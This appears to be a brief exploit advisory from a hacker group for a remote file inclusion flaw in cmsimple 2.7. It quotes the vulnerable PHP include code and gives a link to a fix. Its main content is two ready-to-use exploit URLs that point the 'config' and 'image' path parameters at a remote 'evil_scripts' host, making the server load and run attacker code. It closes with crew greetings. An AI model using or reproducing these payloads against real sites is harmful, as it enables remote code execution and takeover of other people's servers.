cmsimple 2.7 Remote File Include

---

cmsimple 2.7 Remote File Include

---

Author: Alk()mand()z

---

Vuln Code:

if (!@ include ($pth['file']['plugin_index']))

{if(@include($pth['file']['image']))exit;}

---

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?

cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts?

---

download: http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip

---

Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team

##################################

AsB-MaY.NeT & MoHaNdKo.CoM

##################################

–

---

Get your free email from http://www.hackermail.com